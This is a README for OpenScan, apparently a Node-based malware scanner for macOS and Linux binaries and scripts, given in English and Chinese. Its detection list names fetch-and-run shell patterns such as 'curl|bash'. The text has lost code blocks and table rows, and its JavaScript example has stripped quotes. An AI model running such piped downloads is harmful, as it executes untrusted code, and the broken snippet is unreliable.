OpenScan
Lightweight malware detection for macOS and Linux binaries/scripts. Ported from the Harkonnen antimalware engine.
What It Detects
Binary Analysis:
- - Mach-O (macOS) and ELF (Linux) parsing
- Suspicious dylibs/shared objects (Frida, injection frameworks)
- Missing/invalid code signatures (macOS)
- Disabled security features (PIE, NX, RELRO)
- Packed/encrypted binaries (high entropy)
Pattern Detection:
- - Shellcode byte sequences
- Suspicious API references (process injection, keylogging, etc.)
- Network indicators (embedded URLs, IPs)
- Encoded payloads (base64 blobs)
Script Analysis:
- - Dangerous shell patterns (curl|bash, eval, etc.)
- Obfuscation indicators
- Privilege escalation attempts
Usage
CODEBLOCK0
Exit Codes
- -
0 - Clean (score ≤ 20) - INLINECODE1� - Suspicious (score 21-60)
- INLINECODE2� - High threat (score > 60)
Threat Scoring
Each file receives a score from 0-100:
| Score | Level | Meaning |
|---|
| 0-20 | CLEAN | No significant findings |
| 21-40 |
LOW | Minor concerns, probably safe |
| 41-60 | MEDIUM | Suspicious patterns, review manually |
| 61-80 | HIGH | Likely malicious or dangerous |
| 81-100| CRITICAL | Known malicious patterns |
Integration with OpenClaw
Use before installing or trusting unknown binaries:
CODEBLOCK1
Limitations
- - Not a replacement for full antivirus
- Signature-based detection is minimal (no hash database)
- May produce false positives on legitimate security tools
- Cannot detect all obfuscation techniques
Credits
Detection logic ported from Harkonnen antimalware engine.
OpenScan
针对macOS和Linux二进制文件/脚本的轻量级恶意软件检测。移植自Harkonnen反恶意软件引擎。
检测内容
二进制分析:
- - Mach-O(macOS)和ELF(Linux)解析
- 可疑的动态库/共享对象(Frida、注入框架)
- 缺失/无效的代码签名(macOS)
- 禁用的安全特性(PIE、NX、RELRO)
- 加壳/加密的二进制文件(高熵值)
模式检测:
- - Shellcode字节序列
- 可疑API引用(进程注入、键盘记录等)
- 网络指标(嵌入的URL、IP地址)
- 编码的有效载荷(base64数据块)
脚本分析:
- - 危险的Shell模式(curl|bash、eval等)
- 混淆指标
- 提权尝试
使用方法
bash
扫描单个二进制文件
node bin/scan.js /path/to/binary
扫描技能文件夹
node bin/scan.js /path/to/skill-folder
JSON输出用于自动化
node bin/scan.js /path --json
仅显示威胁
node bin/scan.js /path --quiet
退出代码
- - 0 - 安全(评分 ≤ 20)
- 1 - 可疑(评分 21-60)
- 2 - 高威胁(评分 > 60)
威胁评分
每个文件获得0-100分的评分:
低风险 | 轻微问题,可能安全 |
| 41-60 | 中风险 | 可疑模式,需人工审查 |
| 61-80 | 高风险 | 可能恶意或危险 |
| 81-100 | 严重 | 已知恶意模式 |
与OpenClaw集成
在安装或信任未知二进制文件前使用:
javascript
// 示例:在允许技能二进制文件前进行扫描
const { scanFile } = require(openscan/lib/scanner);
async function checkBinary(binPath) {
const result = await scanFile(binPath);
if (result.threatScore > 40) {
throw new Error(二进制文件未通过安全扫描:${result.findings.join(, )});
}
return true;
}
局限性
- - 不能替代完整杀毒软件
- 基于签名的检测能力有限(无哈希数据库)
- 可能对合法安全工具产生误报
- 无法检测所有混淆技术
致谢
检测逻辑移植自Harkonnen反恶意软件引擎。
